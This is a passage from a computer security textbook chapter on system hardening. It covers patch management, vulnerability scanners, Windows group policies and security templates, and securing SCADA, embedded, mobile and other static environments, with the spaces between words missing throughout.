Onceapatchhasbeenanalyzedandtested,administratorshavetodeterminewhentoapplythepatch.Asmanypatchesrequirearestartofapplicationsorservicesorevenarebootoftheentiresystem,mostoperationalenvironmentsapplypatchesonlyatspecifictimes,toreducedowntimeandpossibleimpactandtoensureadministratorsareavailableifsomethinggoeswrong.Manyorganizationswillalsohavearollbackplanthatallowsthemtorecoverthesystemsbacktoaknowngood
configurationpriortothepatch,incasethepatchhasunexpectedorundesirableeffects.Someorganizationsrequireextensivecoordinationandapprovalofpatchespriortoimplementation,andsomeinstitute“lockout”dateswherenopatchingorsystemchanges(withfewexceptions)canbemade,toensurebusinessoperationsarenotdisrupted.Forexample,ane-commercesitemighthavealockoutbetweentheThanksgivingandChristmasholidaystoensurethesiteisalwaysavailabletoholidayshoppers.
TechTip
ProductionPatchingPatchingofproductionsystemsbringsriskinthechangeprocess.Thisriskshouldbemitigatedviaachangemanagementprocess.ChangemanagementiscoveredindetailinChapter21.Patchingofproductionsystemsshouldfollowtheenterprisechangemanagementprocess.
Withanyenvironment,butespeciallywithlargerenvironments,itcanbeachallengetotracktheupdatestatusofeverydesktopandserverintheorganization.Documentingandmaintainingpatchstatuscanbeachallenge.However,withadisciplinedapproach,training,policies,andprocedures,eventhelargestenvironmentscanbemanaged.Toassistintheirpatch-managementefforts,manyorganizationsuseapatch-managementproductthatautomatesmanyofthemundaneandmanpower-intensivetasksassociatedwithpatchmanagement.Forexample,manypatch-managementproductsprovidethefollowing:
Abilitytoinventoryapplicationsandoperatingsystemsinuse
Notificationofpatchesthatapplytoyourenvironment
Periodicorcontinualscanningofsystemstovalidatepatchstatusandidentifymissingpatches
Abilitytoselectwhichpatchestoapplyandtowhichsystemstoapply
them
Abilitytopushpatchestosystemsonanon-demandorscheduledbasis
Abilitytoreportpatchsuccessorfailure
Abilitytoreportpatchstatusonanyorallsystemsintheenvironment
Patch-managementsolutionscanalsobeusefultosatisfyauditorcompliancerequirements,astheycanshowastructuredapproachtopatchmanagement,showwhenandhowsystemsarepatched,andprovideadetailedaccountingofpatchstatuswithintheorganization.Microsoftprovidesafreepatch-managementproductcalledWindows
ServerUpdateServices(WSUS),showninFigure14.18.UsingtheWSUSproduct,administratorscanmanageupdatesforanycompatibleWindows-basedsystemintheirorganization.TheWSUSproductcanbeconfiguredtodownloadpatchesautomaticallyfromMicrosoftbasedonavarietyoffactors(suchasOS,productfamily,criticality,andsoon).Whenupdatesaredownloaded,theadministratorcandeterminewhetherornottopushoutthepatchesandwhentoapplythemtothesystemsintheirenvironment.TheWSUSproductcanalsohelpadministratorstrackpatchstatusontheirsystems,whichisausefulandnecessaryfeature.
•Figure14.18WindowsServerUpdateServices
HostSoftwareBaseliningTosecure,configure,andpatchsoftware,administratorsmustfirstknowwhatsoftwareisinstalledandrunningonsystems.Maintaininganaccuratepictureofwhatoperatingsystemsandapplicationsarerunninginsideanorganizationcanbeaverylabor-intensivetaskforadministrators—especiallyifindividualusershavetheabilitytoloadsoftwareontotheirownserversandworkstations.Toaddressthisissue,manyorganizationsdevelopsoftwarebaselinesforhostsandservers.Sometimescalled“default,”“gold,”or“standard”configurations,asoftwarebaselinecontainsalltheapprovedsoftwarethatshouldappearonadesktoporserverwithintheorganization.Whilesoftwarebaselinescandifferslightlyduetodisparateneedsbetweengroupsofusers,themore“standard”asoftwarebaselinebecomes,theeasieritwillbeforadministratorstosecure,patch,andmaintainsystemswithintheorganization.
VulnerabilityScannerAvulnerabilityscannerisaprogramdesignedtoprobehostsforweaknesses,misconfigurations,oldversionsofsoftware,andsoon.Thereareessentiallythreemaincategoriesofvulnerabilityscanners:network,host,andapplication.Anetworkvulnerabilityscannerprobesahostorhostsforissues
acrosstheirnetworkconnections.Typicallyanetworkscannerwilleithercontainoruseaportscannertoperformaninitialassessmentofthenetworktodeterminewhichhostsarealiveandwhichservicesareopenonthosehosts.Eachsystemandserviceisthenprobed.Networkscannersareverybroadtoolsthatcanrunpotentiallythousandsofchecks,dependingontheOSandservicesbeingexamined.Thismakesthemaverygood“broadsweep”fornetwork-visiblevulnerabilities.
Duetothenumberofcheckstheycanperform,networkscannerscangenerateagreatdealoftrafficandalargenumberofconnectionstothesystemsbeingexamined,socareshouldbetakentominimizetheimpactonproductionsystemsandproductionnetworks.
NetworkscannersareessentiallytheequivalentofaSwissarmyknifeforassessments.Theydolotsoftasksandareextremelyusefultohavearound—theymaynotbeasgoodasatooldedicatedtoexaminingonespecifictypeofservice,butifyoucanonlyrunasingletooltoexamineyournetworkforvulnerabilities,you’llwantthattooltobeanetworkvulnerabilityscanner.Figure14.19showsascreenshotofNessusfromTenableNetworkSecurity,averypopularnetworkvulnerabilityscanner.
•Figure14.19Nessus—anetworkvulnerabilityscanner
Bottomline:Ifyouneedtoperformabroadsweepforvulnerabilitiesononeormorehostsacrossthenetwork,anetworkvulnerabilityscanneristherighttoolforthejob.Hostvulnerabilityscannersaredesignedtorunonaspecifichostand
lookforvulnerabilitiesandmisconfigurationsonthathost.Hostscannerstendtobemorespecializedbecausethey’relookingforissuesassociatedwithaspecificoperatingsystemorsetofoperatingsystems.AgoodexampleofahostscanneristheMicrosoftBaselineSecurityAnalyzer(MBSA),showninFigure14.20.MBSAisdesignedtoexaminethesecuritystateofaWindowshostandofferguidancetoaddressanyvulnerabilities,misconfigurations,ormissingpatches.AlthoughMBSAcanberunagainstremotesystemsacrossthenetwork,itistypicallyrunonthehostbeingexaminedandrequiresyoutohaveaccesstothatlocalhost(attheAdministratorlevel).Theprimarythingtorememberabouthostscannersisthattheyaretypicallylookingforvulnerabilitiesonthesystemtheyarerunningon.
•Figure14.20MicrosoftBaselineSecurityAnalyzer
ExamTip:Ifyouwanttoscanaspecifichostforvulnerabilities,weakpasswordpolicies,orunchangedpasswords,andyouhavedirectaccesstothehost,ahostvulnerabilityscannermightbejustthetooltouse.
Selectingtherighttypeofvulnerabilityscannerisn’tthatdifficult.Justfocusonwhattypesofvulnerabilitiesyouneedtoscanforandhowyouwillbeaccessingthehost/services/applicationsbeingscanned.It’salsoworthnotingthattodoathoroughjob,youwilllikelyneedbothnetwork-basedandhost-basedscanners—particularlyforcriticalassets.Host-andnetwork-basedscannersperformdifferenttestsandprovidevisibilityintodifferenttypesofvulnerabilities.Ifyouwanttoensurethebestcoverage,you’llneedtorunboth.Applicationvulnerabilityscannersaredesignedtolookfor
vulnerabilitiesinapplicationsorcertaintypesofapplications.Applicationscannersaresomeofthemostspecializedscanners—eventhoughtheycontainhundredsoreventhousandsofchecks,theyonlylookformisconfigurationsorvulnerabilitiesinaspecifictypeofapplication.Arguablythemostpopulartypeofapplicationscannersaredesignedtotestforweaknessesandvulnerabilitiesinweb-basedapplications.Webapplicationsaredesignedtobevisible,interactwithusers,andacceptandprocessuserinput—allthingsthatmakethemattractivetargetsforattackers.MoredetailsonapplicationvulnerabilityscannerscanbefoundinChapter18.
ExamTip:Ifyouwanttoexamineaspecificapplicationormultipleinstancesofthesametypeofapplication(suchasawebsite),anapplicationscanneristhetoolofchoice.
GroupPoliciesMicrosoftdefinesagrouppolicyas“aninfrastructureusedtodeliverandapplyoneormoredesiredconfigurationsorpolicysettingstoasetoftargetedusersandcomputerswithinanActiveDirectoryenvironment.ThisinfrastructureconsistsofaGroupPolicyengineandmultipleclient-sideextensions(CSEs)responsibleforwritingspecificpolicysettingsontargetclientcomputers.”IntroducedwiththeWindows2000operatingsystem,grouppoliciesareagreatwaytomanageandconfiguresystemscentrallyinanActiveDirectoryenvironment(WindowsNThadpolicies—buttechnicallynot“grouppolicies”).Grouppoliciescanalsobeusedtomanageusers,makingthesepoliciesvaluabletoolsinanylargeenvironment.WithintheWindowsenvironment,grouppoliciescanbeusedtorefine,
set,ormodifyasystem’sRegistrysettings,auditingandsecuritypolicies,userenvironments,logon/logoffscripts,andsoon.Policysettingsarestoredinagrouppolicyobject(GPO)andarereferencedinternallybytheOSusingagloballyuniqueidentifier(GUID).Asinglepolicycanbelinkedtoasingleuser,agroupofusers,agroupofmachines,oranentireorganizationalunit(OU),whichmakesupdatingcommonsettingsonlargegroupsofusersorsystemsmucheasier.UsersandsystemscanhavemorethanoneGPOassignedandactive,whichcancreateconflictsbetweenpoliciesthatmustthenberesolvedatanattributelevel.Grouppoliciescanalsooverwritelocalpolicysettings.Grouppoliciesshouldnotbeconfusedwithlocalpolicies.Localpoliciesarecreatedandappliedtoaspecificsystem(locally),arenotuserspecific(youcan’thavelocalpolicyXforuserAandlocalpolicyYforuserB),andareoverwrittenbyGPOs.Furtherconfusingsomeadministratorsandusers,policiescanbeappliedatthelocal,site,domain,andOUlevel.Policiesareappliedinhierarchicalorder—local,thensite,thendomain,andsoon.Thismeanssettingsinalocalpolicycanbeoverriddenorreversedbysettingsinthedomainpolicyifthereisaconflictbetweenthetwopolicies.Ifthereisnoconflict,thepolicysettingsareaggregated.
TryThis!WindowsLocalSecurityPoliciesOpenacommandpromptaseitheradministratororauserwithadministratorprivilegesonaWindowssystem.TypethecommandsecpolandpressENTER(thisshouldbringuptheLocalSecurityPolicyutility).ExpandAccountPoliciesontheleftsideoftheLocalSecurityPolicywindow(whichshouldhavea+nexttoit).ClickPasswordPolicy.LookintherightsideoftheLocalSecurityPolicywindow.Whatistheminimumpasswordlength?Whatisthemaximumpasswordageindays?Nowexploresomeofthepolicysettings—butbecareful!Changesmadetothelocalsecuritypolicycanaffectthefunctionalityorusabilityofyoursystem.
CreatingGPOsisusuallydonethrougheithertheGroupPolicyObjectEditor,showninFigure14.21,ortheGroupPolicyManagementConsole(GPMC).TheGPMCisamorepowerfulGUI-basedtoolthatcansummarizeGPOsettings;simplifysecurityfilteringsettings;backup,clone,restore,andeditGPOs;andperformothertasks.AftercreatingaGPO,administratorswillassociateitwiththedesiredtargets.Afterassociation,grouppoliciesoperateonapullmodel.Atasemi-randominterval,theGroupPolicyclientwillcollectandapplyanypoliciesassociatedtothesystemandthecurrentlylogged-onuser.
•Figure14.21GroupPolicyObjectEditor
Microsoftgrouppoliciescanprovidemanyusefuloptionsincluding:
NetworklocationawarenessSystemsarenow“aware”ofwhichnetworktheyareconnectedtoandcanapplydifferentGPOsasneeded.Forexample,asystemcanhaveaveryrestrictiveGPOwhenconnectedtoapublicnetworkandalessrestrictiveGPOwhenconnectedtoaninternal,trustednetwork.
AbilitytoprocesswithoutICMPOldergrouppolicyprocesseswouldoccasionallytimeoutorfailcompletelyifthetargetedsystemdidnotrespondtoICMPpackets.CurrentimplementationsinWindowsVistaandWindows7donotrelyonICMPduringtheGPOupdateprocess.
VPNcompatibilityAsasidebenefitofnetworklocationawareness,mobileuserswhoconnectthroughVPNscanreceiveaGPOupdateinthebackgroundafterconnectingtothecorporatenetworkviaVPN.
PowermanagementStartingwithWindowsVista,powermanagementsettingscanbeconfiguredusingGPOs.
DeviceaccessblockingUnderWindowsVistaandWindows7,policysettingshavebeenaddedthatallowadministratorstorestrictuseraccesstoUSBdrives,CD-RWdrives,DVD-RWdrives,andotherremovablemedia.
Location-basedprintingUserscanbeassignedtovariousprintersbasedontheirlocation.Asmobileusersmove,theirprinterlocationscanbeupdatedtotheclosestlocalprinter.
InWindows,policiesareappliedinhierarchicalorder.Localpoliciesgetappliedfirst,thensite
policies,thendomainpolicies,andfinallyOUpolicies.Ifasettingfromalaterpolicyconflictswithasettingfromanearlierpolicy,thesettingfromthelaterpolicy“wins”andisapplied.Keepthisinmindwhenbuildinggrouppolicies.
SecurityTemplatesAsecuritytemplateissimplyacollectionofsecuritysettingsthatcanbeappliedtoasystem.WithintheWindowsOSs,securitytemplatescancontainhundredsofsettingsthatcontrolormodifysystemsettingssuchaspasswordlength,auditingofuseractions,orrestrictionsonnetworkaccess.Securitytemplatescanbestandalonefilesthatareappliedmanuallytoeachsystem,buttheycanalsobepartofagrouppolicy,allowingcommonsecuritysettingstobeappliedtosystemsonamuchwiderscale.
ExamTip:Asecuritytemplateisacollectionofsecuritysettingsthatcanbeappliedtoasystem.Microsoftsecuritytemplatefileshavean.infextensionandareusuallystoredinC:\WINDOWS\security\templates.
Asanadministrator,whenyouarecreatingasecuritytemplate,allsettingsareinitially“notconfigured,”whichmeansthetemplatewillmakenochangestowhateversettingsarealreadyinplace.Byselectingthesettingsyouwanttomodify,youcanfine-tunethetemplatetocreateamore(orless)securesystem.Securitytemplatestypicallyconfiguresettingsinthefollowingareas:
AccountpoliciesSettingsforuseraccounts,suchaspasswordlength,complexityrequirements,accountlockouts,andsoon.
EventlogsettingsSettingsthatapplytothethreemainauditlogswithinWindows(Application,System,andSecurity),suchaslogfilesize,retentionofolderentries,andsoon.
FilepermissionsSettingsthatapplytofilesandfolders,suchaspermissioninheritance,lockingpermissions,andsoon.
RegistrypermissionsSettingsthatcontrolwhocanaccesstheRegistryandhowitcanbeaccessed.
RestrictedgroupsSettingsthatcontrolwhoshouldbeallowedtojoinorbepartofcertaingroups.Iftheuserisnotalreadyamemberofagroupasdefinedinthepolicy,youwillnotbeabletoaddthatusertothecorrespondinggrouponthelocalsystem.
SystemservicesSettingsforservicesthatrunonthesystem,suchasstartupmode,whetherornotuserscanstop/starttheservice,andsoon.
UserrightsSettingsthatcontrolwhatausercanandcannotdoonthesystem.
TechTip
AGoodAdministrator’sWorkIsNeverDoneOnceasystemornetworkdeviceisbaselined,anadministrator’sworkisfarfromover.Continuoussecuritymonitoringisthenever-endingprocessofcollectingdatapointsandmetrics,analyzingthem,andusingthecollecteddatatoadjustsecurityposturesasneeded.Whenthesecuritymonitoringuncoversanissueorvulnerability,theprocessofremediationbegins.Remediationistheprocessofaddressingasecurityflaw,vulnerability,orsimilarissue.Youmightsaythatagoodadministrator’sworkisneverdone.
Youcancreateand/ormodifysecuritytemplatesonyourlocalsystemthroughtheMicrosoftManagementConsole(ifyouhavetheSecurityTemplatessnap-ininstalled).Microsoftincludesaseriesofpredefinedsecuritytemplates(usuallystoredin\WINDOWS\security\templates)thatwillappearunderSecurityTemplatesinyourMMCwindow.Thesetemplatesrangefromminimaltomaximalsecurityandcanallbeappliedas-isormodifiedasneeded.Youcanalsocreateacompletelynewsecurity
templateandthencustomizeeachofthesettingstoyourspecifications.Figure14.22showstheMMCwiththeSecurityTemplatessnap-inenabled.
•Figure14.22MMCwithSecurityTemplatessnap-in
AlternativeEnvironmentsAlternativeenvironmentsarethosethatarenottraditionalcomputersystemsinacommonITenvironment.Thisisnottosaythattheseenvironmentsarerare;infact,therearemillionsofsystems,composedofhundredsofmillionsofdevices,allacrosssociety.Computersexistinmanysystemswheretheyperformcriticalfunctionsspecificallytiedtoaparticularsystem.Thesealternativesystemsarefrequentlystaticinnature;thatis,theirsoftwareisunchangingoverthecourseofitsfunction.Updatesandrevisionsarefewandfarbetween.Whilethismayseemtobecountertocurrentsecuritypractices,itisn’t:becausethesealternativesystemsareconstrainedtoalimited,definedsetoffunctionality,theriskfromvulnerabilitiesislimited.Examplesofthesealternativeenvironmentsincludeembeddedsystems,SCADAsystems,mobiledevices,mainframes,gameconsoles,andin-vehiclecomputers.
SCADASCADAisanacronymforsupervisorycontrolanddataacquisition,asystemdesignedtocontrolautomatedsystemsincyber-physicalenvironments.SCADAsystemscontrolmanufacturingplants,trafficlights,refineries,energynetworks,waterplants,buildingautomationandenvironmentalcontrols,andahostofothersystems.SCADAisalsoknownbynamessuchasdistributedcontrolsystems(DCS)andindustrialcontrolsystems(ICS),thevariationsdependingontheindustryandtheconfiguration.Wherecomputerscontrolaphysicalprocessdirectly,aSCADAsystemlikelyisinvolved.MostSCADAsystemsinvolvemultiplecomponentsnetworkedtogether
toachieveasetoffunctionalobjectives.Thesesystemsfrequentlyincludeahumanmachineinterface(HMI),whereanoperatorcanexertaformofdirectivecontrolovertheoperationofthesystemundercontrol.SCADAsystemshistoricallyhavebeenisolatedfromothersystems,buttheisolationisdecreasingasthesesystemsarebeingconnectedacross
traditionalnetworkstoimprovebusinessfunctionality.ManyolderSCADAsystemswereairgappedfromthecorporatenetwork;thatis,theysharednodirectnetworkconnections.Thismeantthatdataflowsinandoutwerehandledmanuallyandtooktimetoaccomplish.ModernsystemswishedtoremovethisconstraintandaddeddirectnetworkconnectionsbetweentheSCADAnetworksandtheenterpriseITnetwork.Theseconnectionsincreasetheattacksurfaceandtherisktothesystem,andthemoretheyresembleanITnetworkedsystem,thegreatertheneedforsecurityfunctions.SCADAsystemshavebeendrawnintothesecurityspotlightwiththe
StuxnetattackonIraniannuclearfacilities,initiallyreportedin2010.StuxnetismalwaredesignedtospecificallyattackaspecificSCADAsystemandcausefailuresresultinginplantequipmentdamage.Thisattackwascomplexandwelldesigned,cripplingnuclearfuelprocessinginIranforasignificantperiodoftime.ThisattackraisedawarenessoftherisksassociatedwithSCADAsystems,whetherconnectedtotheInternetornot(Stuxnetcrossedanairgaptohititstarget).
EmbeddedSystemsEmbeddedsystemisthenamegiventoacomputerthatisincludedasanintegralpartofalargersystem.Fromcomputerperipheralslikeprinters,tohouseholddeviceslikesmartTVsandthermostats,tothecaryoudrive,embeddedsystemsareeverywhere.Embeddedsystemscanbeassimpleasamicrocontrollerwithfullyintegratedinterfaces(asystemonachip)orascomplexasthetensofinterconnectedembeddedsystemsinamodernautomobile.Embeddedsystemsaredesignedwithasinglecontrolpurposeinmindandhavevirtuallynoadditionalfunctionality,butthisdoesnotmeanthattheyarefreeofriskorsecurityconcerns.Thevastmajorityofsecurityexploitsinvolvegettingadeviceorsystemtodosomethingitiscapableofdoing,andtechnicallydesignedtodo,eveniftheresultingfunctionalitywasneveranintendeduseofthedeviceorsystem.Thedesignersofembeddedsystemstypicallyarefocusedon
minimizingcosts,withsecurityseldomseriouslyconsideredaspartofeitherthedesignortheimplementation.Becausemostembeddedsystemsoperateasisolatedsystems,theriskshavenotbeensignificant.However,ascapabilitieshaveincreased,andthesedeviceshavebecomenetworkedtogether,theriskshaveincreasedsignificantly.Forexample,smartprintershavebeenhackedasawayintoenterprises,andasawaytohidefromdefenders.Andwhennext-generationautomobilesbegintotalktoeachother,passingtrafficandotherinformationbetweenthem,andbegintohavenavigationandotherinputsbeingbeamedintosystems,theriskswillincreaseandsecuritywillbecomeanissue.Thishasalreadybeenseenintheairlineindustry,wheretheseparationofin-flightWi-Fi,in-flightentertainment,andcockpitdigitalflightcontrolnetworkshasbecomeasecurityissue.
ExamTip:Understandstaticenvironments,systemsinwhichthehardware,OS,applications,andnetworksareconfiguredforaspecificfunctionorpurpose.Thesesystemsaredesignedtoremainunalteredthroughtheirlifecycle,rarelyrequiringupdates.
Building-automationsystems,climatecontrolsystems,HVACsystems,elevatorcontrolsystems,andalarmsystemsarejustsomeoftheexamplesofsystemsthataremanagedbyembeddedsystems.Althoughthesesystemsusedtobeindependentandstandalonesystems,theriseofhyperconnectivityhasshownvalueinintegratingthem.Havinga“smartbuilding”thatreducesbuildingresourcesinaccordancewiththenumberanddistributionofpeopleinsideincreasesefficiencyandreducescosts.InterconnectingthesesystemsandaddinginInternet-basedcentralcontrolmechanismsdoesincreasetheriskprofilefromoutsideattacks.
PhonesandMobileDevicesMobiledevicesmayseemtobeastaticenvironment,onewheretheOS
rarelychangesorisrarelyupdated,butasthesedevicesbecomemoreandmoreubiquitousincapability,thisisnotturningouttobethecase.MobiledeviceshaveregularsoftwareupdatestotheOS,andusersaddapplications,makingmostmobiledevicesacompletesecuritychallenge.MobiledevicesfrequentlycomewithBluetoothconnectivitymechanisms.ProtectionofthedevicesfromattacksagainsttheBluetoothconnection,suchasbluejackingandbluesnarfing,isanimportantmitigation.Toprotectagainstunauthorizedconnections,aBluetoothdeviceshouldalwayshavediscoverablemodeturnedoffunlesstheuserisdeliberatelypairingthedevice.Therearemanydifferentoperatingsystemsusedinmobiledevices,the
mostcommonofthesebymarketsharebeingAndroidandiOSfromApple.Androidisbyfarthelargestfootprint,followeddistantlybyApple’siOS.MicrosoftandBlackberryhavetheirownOSs,butneitherhasmajornumbersofusers.
AndroidAndroidisagenericnameassociatedwiththemobileOSthatisbasedonLinux.GoogleacquiredtheAndroidplatform,madeitopensource,andbeganshippingdevicesin2008.Androidhasundergoneseveralupdatessince,andmostsystemshavesomedegreeofcustomizationaddedforspecificmobilecarriers.Androidhashadnumeroussecurityissuesovertheyears,rangingfromvulnerabilitiesthatallowattackersaccesstotheOS,tomalware-infectedapplications.TheAndroidplatformcontinuestoevolveasthecodeiscleanedupandthenumberofvulnerabilitiesisreduced.Theissueofmalware-infectedapplicationsismuchtoughertoresolve,astheabilitytocreatecontentandaddittotheappstore(GooglePlay)isconsiderablylessregulatedthanintheAppleandMicrosoftecosystems.Theuseofmobiledevicemanagement(MDM)systemsisadvisedin
enterprisedeployments,especiallywhenBYODoccurs.ThisandothersecurityaspectsspecifictomobiledevicesarecoveredinChapter12.
iOSiOSisthenameofApple’sproprietaryoperatingsystemforitsmobileplatforms.BecauseAppledoesnotlicensethesoftwareforuseotherthanonitsowndevices,AppleretainsfullandcompletecontrolovertheOSandanyspecificcapabilities.Applehasalsoexertedsignificantcontroloveritsapplicationstore,whichhasdramaticallylimitedtheincidenceofmalwareintheAppleecosystem.
JailbreakingAcommonhackassociatedwithiOSdevicesisthejailbreak.Jailbreakingisaprocessbywhichtheuserescalatestheirprivilegelevel,bypassingtheoperatingsystem’scontrolsandlimitations.Theuserstillhasthecompletefunctionalityofthedevice,butalsohasadditionalcapabilities,bypassingtheOS-imposeduserrestrictions.Thereareseveralschoolsofthoughtconcerningtheutilityofjailbreaking,buttheimportantissuefromasecuritypointofviewisthatrunninganydevicewithenhancedprivilegescanresultinerrorsthatcausemoredamage,becausenormalsecuritycontrolsaretypicallybypassed.
MainframeMainframesrepresentthehistoryofcomputing,andalthoughmanypeoplethinktheyhavedisappeared,theyarestillverymuchaliveinenterprisecomputing.Mainframesarehigh-performancemachinesthatofferlargequantitiesofmemory,computingpower,andstorage.Mainframeshavebeenusedfordecadesforhigh-volumetransactionsystemsaswellashigh-performancecomputing.Thesecurityassociatedwithmainframesystemstendstobebuiltintotheoperatingsystemonspecific-purposemainframes.Mainframeenvironmentstendtohaveverystrongconfigurationcontrolmechanisms,andveryhighlevelsofstability.Mainframeshavebecomeacost-effectivesolutionformanyhigh-
volumeapplicationsbecausemanyinstancesofvirtualmachinescanrun
onthemainframehardware.Thisopensthedoorformanynewsecurityvulnerabilities—notonthemainframehardwareperse,butratherthroughvulnerabilitiesintheguestOSinthevirtualenvironment.
GameConsolesComputer-basedgameconsolescanbeconsideredatypeofembeddedsystemdesignedforentertainment.TheOSinagameconsoleisnottherefortheuser,butrathertheretosupportthespecificapplicationsorgame.TheretypicallyisnouserinterfacetotheOSonagameconsoleforausertointeractwith;rather,theOSisdesignedforasolepurpose.Withtheriseofmultifunctionentertainmentconsoles,theattacksurfaceofagamingconsolecanbefairlylarge,butitisstillconstrainedbytheclosednatureofthegamingecosystem.UpdatesforthefirmwareandOS-levelsoftwareareprovidedbytheconsolemanufacturer.Thisclosedenvironmentoffersareasonablelevelofriskassociatedwiththesecurityofthesystemsthatareconnected.Asgameconsolesbecomemoregeneralinpurposeandincludefeaturessuchaswebbrowsing,therisksincreasetolevelscommensuratewithanyothergeneralcomputingplatform.
In-vehicleComputingSystemsMotorvehicleshavehadembeddedcomputersinthemforyears,regulatingenginefunctions,environmentalcontrols,anddashboarddisplays.Recentlythefunctionalityhasexpandedtoonscreenentertainmentandnavigationsystems.Asthefunctionalityofthesystemsisexpanding,withtheadditionofnetworkingcapability,thesamesecurityrisksassociatedwithothernetworkedsystemsemerge.Asthein-vehiclecomputingsystemscontinuetointegratewithmobileelectronics,andwiththecomingvehicle-to-vehicleandvehicle-to-roadwaycommunications,securityriskswillincreaseandbecomeapressingissue.
AlternativeEnvironmentMethods
Manyofthealternativeenvironmentscanbeconsideredstaticsystems.Staticsystemsarethosethathaveadefinedscopeandpurposeanddonotregularlychangeinadynamicmanner,unlikemostPCenvironments.Staticsystemstendtohaveclosedecosystems,withcompletecontroloverallfunctionalitybyasinglevendor.Awiderangeofsecuritytechniquescanbeemployedinthemanagementofalternativesystems.Networksegmentation,securitylayers,wrappers,andfirewallsassistinthesecuringofthenetworkconnectionsbetweenthesesystems.Manualupdates,firmwarecontrol,andcontrolredundancyassistinthesecurityofthedeviceoperation.
NetworkSegmentationNetworksegmentationistheuseofthenetworkarchitecturetolimitcommunicationbetweendevices.Avarietyofnetworkingmechanismscanbeusedtolimitaccesstodevicesatthenetworklevel.LogicalnetworksegmentationcanbedoneviaVLANs,MACandIPaddressrestrictionsatroutersandswitches,firewallfiltering,andaccesscontrolmechanisms.Oneofthechallengeswithalternativesystemsisthatthedevicesthemselvesmaynothavetypicalsecuritycontrolssuchasaccesscontrolsorencryptionincludedintheirfunctionsets.Thismakesexternalcontrolssuchasnetworksegmentationevenmorecriticalaspartofasecuritysolution.
SecurityLayersTheuseofdifferentlayerstoperformdifferentfunctionshasbeenastapleofcomputersciencefordecades.Employinglayerstoenforcesecurityaspectshasalsobeenalong-standingconcept.Notalllayershavethesameinformationorprocessingcapability,andusingeachlayertoachieveapartofthesecuritysolutionleadstomorerobustsecuritysolutions.Whileanetworkcanmanagetrafficbasedonnetworkinginformation,thisisnotacompletesecuritysolution.Addingadditionallayers,suchasapplication
layerfirewallsandauthenticationservices,addsadditionalsecurityfunctionsthatfurtherreducetheriskassociatedwiththesystem.
ApplicationFirewallsApplicationfirewallsarepolicy-enforcementmechanismsthatoperateattheapplicationlayertoenforceasetofcommunicationrules.Whileanetworkfirewallexaminesnetworktrafficandenforcesrulesbasedonaddresses,anapplicationfirewalladdssignificantlygreaterabilitytocontrolanapplication’scommunicationsacrossthenetwork.
ManualUpdatesAllsystemseventuallyrequireupdatestofixissues,patchvulnerabilities,andevenchangefunctionality.Inalternativeenvironments,thesechangesareinmanycasesdoneinamanualmanner.Manualupdatescanbeusedtorestricttheaccesstothesystem,preventingunauthorizedchangestoasystem.Insomecases,becauseofscale,anautomatedsystemmaybeusedtopushouttheupdates,buttheprincipleoftightlycontrollingaccesstosystemupdatefunctionalityneedstobepreserved.
FirmwareVersionControlFirmwareispresentinvirtuallyeverysystem,butinmanyembeddedsystemsitplaysanevenmorecriticalrole,asitmayalsocontaintheOSandapplication.Maintainingstrictcontrolmeasuresoverthechangingoffirmwareisessentialtoensuringtheauthenticityofthesoftwareonasystem.Firmwareupdatesrequireextremequalitymeasurestoensurethaterrorsarenotintroducedaspartofanupdateprocess.Updatingfirmware,althoughonlyoccasionallynecessary,isaverysensitiveevent,forfailurecanleadtosystemmalfunction.Ifanunauthorizedpartyisabletochangethefirmwareofasystem,asdemonstratedinanattackagainstATMs,anadversarycangaincompletefunctionalcontroloverasystem.
WrappersTCPwrappersarestructuresusedtoencloseorcontainsomeothersystem.Wrappershavebeenusedinavarietyofways,includingtoobscureorhidefunctionality.ATrojanhorseisaformofwrapper.Wrappersalsocanbeusedtoencapsulateinformation,suchasintunnelingorVPNsolutions.Wrapperscanactasaformofchannelcontrol,includingintegrityandauthenticationinformationthatanormalsignalcannotcarry.ItiscommontoseewrappersusedinalternativeenvironmentstopreparecommunicationsforIPtransmission.
ControlRedundancyandDiversityDefenseindepthisoneoftheunderlyingsecurityfundamentals,andthisisespeciallyneededinalternativeenvironments.Manyalternativeenvironmentsarenotequippedwithon-boardencryption,accesscontrol,orauthenticationservices.Thismakesthecontrolsthatsurroundthedeviceevenmorecriticalinensuringsecureoperation.Designingoverlappingcontrolssuchthateachassiststheothersbutdoes
notduplicatethemaddssignificantstrengthtoasecuritysolution.Theobjectiveistoraisebarrierstoentry,preventingunauthorizedpartiesfromreachingvulnerabilities,andtomitigatethosevulnerabilitiestheycanreachsuchthattheattackercannotproceedfurther.Thereisnosuchthingasperfectsecurity,butaseriesofoverlappingcontrolscanmakeexploitationnearlyimpossible.Whenthesystemisinanalternativeenvironment,whetherstaticornot,
theprinciplesofsecuritystillapply.Infact,inmanycases,theyareevenmorecriticalbecausethedevicesthemselveshavelittletonosecurityfunctionalityandthusdependonthesupportingenvironmenttobesecure.Adiversityofcontrolsinredundant,overlappingstructuresisthebestmethodofprovidingthislevelofmitigation.
ExamTip:Understandstaticenvironmentsecuritymethods.Staticsystemsrequiresecurityandtechniquessuchasnetworksegmentation,securitylayers,firewalls,wrappers,andothersecuritycontrols.
Chapter14Review
ForMoreInformationMicrosoft’sSafety&SecurityCenterwww.microsoft.com/security/default.mspx
SANSReadingRoom:ApplicationandDatabaseSecuritywww.sans.org/reading_room/whitepapers/application/
LabManualExercisesThefollowinglabexercisesfromthecompanionlabmanual,PrinciplesofComputerSecurityLabManual,FourthEdition,providepracticalapplicationofmaterialcoveredinthischapter:
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingabouthardeningsystemsandbaselines.
Hardenoperatingsystemsandnetworkoperatingsystems
Securitybaselinesarecriticaltoprotectinginformationsystems,particularlythoseallowingconnectionsfromexternalusers.
Theprocessofestablishingasystem’ssecuritystateiscalledbaselining,andtheresultingproductisasecuritybaselinethatallowsthesystemtorunsafelyandsecurely.
Hardeningistheprocessbywhichoperatingsystems,networkresources,andapplicationsaresecuredagainstpossibleattacks.
Securingoperatingsystemsconsistsofremovingordisablingunnecessaryservices,restrictingpermissionsonfilesanddirectories,removingunnecessarysoftware(ornotinstallingitinthefirstplace),applyingthelatestpatches,removingunnecessaryuseraccounts,andensuringstrongpasswordguidelinesareinplace.
Securingnetworkresourcesconsistsofdisablingunnecessaryfunctions,restrictingaccesstoportsandservices,ensuringstrong
passwordsareused,andensuringthecodeonthenetworkdevicesispatchedanduptodate.
Securingapplicationsdependsheavilyontheapplicationinvolvedbuttypicallyconsistsofremovingsamplesanddefaultmaterials,preventingreconnaissanceattempts,andensuringthesoftwareispatchedanduptodate.
Implementhost-levelsecurity
